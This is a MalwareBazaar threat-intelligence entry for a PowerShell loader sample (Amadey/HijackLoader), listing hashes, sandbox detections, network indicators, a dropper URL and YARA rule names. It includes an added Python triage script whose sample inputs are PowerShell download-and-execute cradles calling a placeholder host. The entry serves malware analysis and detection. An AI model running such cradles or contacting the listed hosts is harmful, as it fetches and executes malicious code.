MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Amadey


Vendor detections: 13



SHA256 hash: 1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998
SHA3-384 hash: 2faf2512ab36ca4130b54d32d581b6646cf7a1df6874dcafb1320155bdf75659cd7f65f3c7f78439facc66214ade2d3c
SHA1 hash: 6e1542ac1a5ed4f320b00d2d0048df58befbbe19
MD5 hash: faa697a39f300b11ed0edfaa3bd25ac1
humanhash: april-item-fix-bulldog
File name: NTR.ps1
Signature: Amadey
File size: 19'236'606 bytes
First seen: 2025-10-13 20:34:07 UTC
Last seen: Never
File type: PowerShell (PS) ps1
MIME type: text/plain
ssdeep: 49152:0GISdPTIf2yJ36FeCYPs7dWhToJ/p63hUbbuFmdbjKU63jJ9fZMTs3QMotWueM6m:J
Threatray: 79 similar samples on MalwareBazaar
TLSH: T1C8173310AFA9ADBF0668822CB0BF5F0E1BF10F94844DA2EB47E175C7128F7915917C69
Magika: powershell
Reporter: smica83
Tags: Amadey ps1

Intelligence


File Origin
# of uploads: 1
# of downloads: 133
Origin country: HU
Vendor Threat Intelligence

Verdict: Malicious
Score: 97.4%
Tags: ransomware vmdetect spawn smtp

Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: anti-vm base64 obfuscated stealer

Result
Threat name: HijackLoader
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signature
AI detected malicious Powershell script
Allocates memory in foreign processes
Antivirus detection for dropped file
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for dropped file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powershell Download and Execute IEX
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
Writes to foreign memory regions
Yara detected HijackLoader
Yara detected Powershell download and execute
Yara detected Python Injector
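Several of the hits above ("PowerShell Base64 Encoded IEX Cmdlet", "Powershell Download and Execute IEX", "Bypasses PowerShell execution policy") are command-line patterns rather than file signatures. The script below is an added example, not code from MalwareBazaar, Joe Sandbox or the Sigma project: it decodes a powershell.exe -EncodedCommand argument (UTF-16LE wrapped in base64) and applies my own regex approximations of those three checks to constructed sample command lines. The regexes are not the Sigma rules themselves, and none of the command lines are taken from this sample.

```python
import base64
import binascii
import re
from typing import Optional

# Approximations of the Sigma-style checks named in the sandbox report.
# These regexes are written for this example and are not the Sigma rules themselves.
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(?:downloadstring|downloadfile|downloaddata|net\.webclient|invoke-webrequest"
    r"|\biwr\b|invoke-restmethod|\birm\b|start-bitstransfer)",
    re.IGNORECASE,
)
BYPASS_RE = re.compile(r"-(?:ep|ex\w*)\s+bypass\b", re.IGNORECASE)
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the base64 argument.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid UTF-16LE base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Flag one powershell.exe command line with the three patterns above."""
    decoded = decode_encoded_command(cmdline)
    # Drop the base64 blob before matching so random base64 letters cannot trigger a hit.
    visible = ENC_RE.sub("-enc <blob>", cmdline)
    text = visible if decoded is None else visible + " " + decoded
    flags = []
    if decoded is not None and IEX_RE.search(decoded):
        flags.append("base64_encoded_iex")
    if IEX_RE.search(text) and DOWNLOAD_RE.search(text):
        flags.append("download_and_execute")
    if BYPASS_RE.search(visible):
        flags.append("execution_policy_bypass")
    return {"cmdline": cmdline, "decoded": decoded, "flags": flags}


# Constructed sample command lines (not from this sample): an encoded cradle,
# a plain cradle with an execution-policy bypass, and a benign admin script.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
    ),
    'powershell.exe -ep bypass -c "iwr http://203.0.113.10/a.ps1 | iex"',
    "powershell.exe -File C:\\scripts\\backup.ps1",
]


def triage_all(cmdlines=SAMPLE_CMDLINES) -> list:
    """Run triage over a list of command lines and return the per-line results."""
    return [triage(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage_all():
        print(result["flags"] or ["clean"], "<-", result["cmdline"][:70])
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

The blob is decoded before matching because an encoded cradle carries none of its keywords in the visible command line; a rule that only looks at the raw line misses exactly the case the "Base64 Encoded IEX" signature is about. Feed real Sysmon Event ID 1 or 4688 command lines into triage_all to use it as a quick hunting filter.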
Behaviour
Behavior Graph (ID 1794384; sample NTR.ps1; start date 13/10/2025; architecture WINDOWS; score 100). Graph node numbers are kept in parentheses; for network contacts the remote port is given.

Top level (node 2)
  Domains: mi.limpingbronco.com, io.comecola.digital, 6 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  Starts: powershell.exe (12), cloRcNgGX9MeGdmu79FGtg.exe (15), cloRcNgGX9MeGdmu79FGtg.exe (18), 3 other processes (20)

powershell.exe (12)
  Signatures: Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Suspicious execution chain found; 2 other signatures
  Starts: Setup.exe (23), powershell.exe (27), powershell.exe (29), conhost.exe (31)

cloRcNgGX9MeGdmu79FGtg.exe (15)
  Dropped: C:\Users\user\AppData\Local\...\_isFB06.exe (PE32+)
  Starts: _isFB06.exe (33)

cloRcNgGX9MeGdmu79FGtg.exe (18)
  Dropped: C:\Users\user\AppData\Local\...\_is26E9.exe (PE32+)
  Starts: _is26E9.exe (35)

3 other processes (20)
  Network: 127.0.0.1
  Dropped: C:\Users\user\AppData\Local\...\_is67E9.exe (PE32+), C:\Users\user\AppData\Local\...\_is4790.exe (PE32+)
  Starts: _is4790.exe (37), _is67E9.exe (39)

Setup.exe (23)
  Dropped: C:\Users\user\...\MicrosoftEdgeUpdate.exe (PE32), C:\Users\user\AppData\Local\...\A1CE3AC.tmp (PE32), C:\ProgramData\...\VCRUNTIME140.dll (PE32), 4 other malicious files
  Signatures: Found hidden mapped module (file has been removed from disk); Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
  Starts: MicrosoftEdgeUpdate.exe (41)

powershell.exe (27)
  Signatures: Deletes itself after installation
  Starts: conhost.exe (45)

powershell.exe (29)
  Starts: conhost.exe (47)

_isFB06.exe (33)
  Signatures: Multi AV Scanner detection for dropped file
  Starts: cmd.exe (49)

_is26E9.exe (35): starts cmd.exe (51)
_is4790.exe (37): starts cmd.exe (53)
_is67E9.exe (39): starts cmd.exe (55)
cmd.exe (49, 51, 53, 55): each starts a conhost.exe (66, 68, 70, 72)

MicrosoftEdgeUpdate.exe (41)
  Network: 85.209.128.128:80 (VELIANET-AS, velia.net Internetdienste GmbH, DE; geolocated Netherlands), 138.201.246.107:443 (HETZNER-AS, Germany)
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Bypasses PowerShell execution policy; Contains functionality to inject code into remote processes; 8 other signatures
  Starts: rundll32.exe (57), powershell.exe (62), powershell.exe (64), 5 other processes (74)

rundll32.exe (57)
  Network: mi.limpingbronco.com 172.67.168.12 (CLOUDFLARENET, United States), io.comecola.digital 172.67.209.123:443 (CLOUDFLARENET, United States)
  Dropped: C:\Users\user\...\socLbCJDVajuk3xLR7H6mPH.exe (PE32+), C:\Users\user\...\cloRcNgGX9MeGdmu79FGtg.exe (PE32+), C:\Users\user\...\socLbCJDVajuk3xLR7H6mPH[1] (PE32+), C:\Users\user\...\cloRcNgGX9MeGdmu79FGtg[1] (PE32+)
  Signatures: System process connects to network (likely due to code injection or exploit); Creates multiple autostart registry keys
  Starts: cloRcNgGX9MeGdmu79FGtg.exe (76), socLbCJDVajuk3xLR7H6mPH.exe (80)

powershell.exe (62)
  Signatures: Powershell uses Background Intelligent Transfer Service (BITS); Loading BitLocker PowerShell Module
  Starts: net.exe (82), conhost.exe (84)

powershell.exe (64)
  Network: 87.120.219.26:80 (NET1-AS, Bulgaria)
  Starts: conhost.exe (86)

5 other processes (74)
  Starts: WerFault.exe (88), WerFault.exe (90), WerFault.exe (92), 3 other processes (94)

cloRcNgGX9MeGdmu79FGtg.exe (76)
  Dropped: C:\Users\user\AppData\Local\...\_isB6AA.exe (PE32+)
  Signatures: Multi AV Scanner detection for dropped file
  Starts: _isB6AA.exe (96)

socLbCJDVajuk3xLR7H6mPH.exe (80)
  Dropped: C:\Users\user\AppData\Local\...\_isD781.exe (PE32+)
  Starts: _isD781.exe (100)

net.exe (82): starts net1.exe (102)

_isB6AA.exe (96)
  Dropped: C:\Users\user\AppData\...\vcruntime140.dll (PE32), C:\Users\user\AppData\Local\...\sqlite3.dll (PE32), C:\Users\user\AppData\Local\...\select.pyd (PE32), 13 other malicious files
  Signatures: Multi AV Scanner detection for dropped file; Found pyInstaller with non standard icon
  Starts: pythonw.exe (104)

_isD781.exe (100)
  Dropped: C:\Users\user\AppData\Local\...\Setup_UI.dll (PE32+), C:\Users\user\AppData\...\vcruntime140.dll (PE32), C:\Users\user\AppData\Local\...\sqlite3.dll (PE32), 13 other malicious files
  Starts: pythonw.exe (107)

pythonw.exe (104)
  Network: 91.242.163.152:1477 (OOO-SYSMEDIA-AS, Russian Federation), a8a00b7a27dd309f6.awsglobalaccelerator.com 3.33.196.84:8545 (AMAZONEXPANSIONGB, United States), 2 other IPs or domains

pythonw.exe (107)
  Network: 212.34.145.107:30312 (RAN-NETWORKSES, Spain), 91.212.166.19:443 (MOBILY-AS Etihad Etisalat Company Mobily SA, United Kingdom), 2 other IPs or domains
Verdict: Malware
YARA: 3 match(es)
Tags: Base64 Block CAB:COMPRESSION:MSZIP Contains Base64 Block DeObfuscated PowerShell

Threat name: Script-PowerShell.Trojan.Malgent
Status: Malicious
First seen: 2025-10-12 22:57:07 UTC
File Type: Text (PowerShell)
AV detection: 3 of 24 (12.50%)
Threat level: 5/5

Result
Malware family: hijackloader
Score: 10/10
Tags: family:hijackloader discovery execution loader spyware stealer
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Deletes itself
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Malware Config
Dropper Extraction: http://87.120.219.26/mix2pgYCDbF4pdNYtz
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:CP_Script_Inject_Detector
Author:DiegoAnalytics
Description:Detects attempts to inject code into another process across PE, ELF, Mach-O binaries
Rule name:DebuggerCheck__QueryInfo
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DetectEncryptedVariants
Author:Zinyth
Description:Detects 'encrypted' in ASCII, Unicode, base64, or hex-encoded
Rule name:detect_powershell
Author:daniyyell
Description:Detects suspicious PowerShell activity related to malware execution
Rule name:Detect_PowerShell_Obfuscation
Author:daniyyell
Description:Detects obfuscated PowerShell commands commonly used in malicious scripts.
Rule name:dgaagas
Author:Harshit
Description:Uses certutil.exe to download a file named test.txt
Rule name:FreddyBearDropper
Author:Dwarozh Hoshiar
Description:Freddy Bear Dropper drops malware through a base64-encoded PowerShell script.
Rule name:golang_bin_JCorn_CSC846
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:HeavensGate
Author:kevoreilly
Description:Heaven's Gate: switch from 32-bit to 64-bit mode
Rule name:INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
Author:ditekSHen
Description:Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers
Rule name:malware_shellcode_hash
Author:JPCERT/CC Incident Response Group
Description:detect shellcode api hash value
Rule name:meth_stackstrings
Author:Willi Ballenthin
Rule name:RANSOMWARE
Author:ToroGuitar
Rule name:shellcode
Author:nex
Description:Matched shellcode byte patterns
Rule name:Sus_CMD_Powershell_Usage
Author:XiAnzheng
Description:May contain (obfuscated or not) PowerShell or CMD commands that can be abused by a threat actor (can create FPs)
Rule name:ThreadControl__Context
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:vmdetect
Author:nex
Description:Possibly employs anti-virtualization techniques
Rule name:Warp
Author:Seth Hardy
Description:Warp
Rule name:WarpStrings
Author:Seth Hardy
Description:Warp Identifying Strings
Rule name:Windows_Exploit_Generic_008359cf
Author:Elastic Security
Rule name:Windows_Trojan_ACRStealer_f9728d76
Author:Elastic Security
Rule name:WIN_FileFix_Detection
Author:dogsafetyforeverone
Description:Detects FileFix social engineering technique that launches chained PowerShell and PHP commands from file explorer typed paths
Reference:FileFix social engineering with PowerShell and PHP commands

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments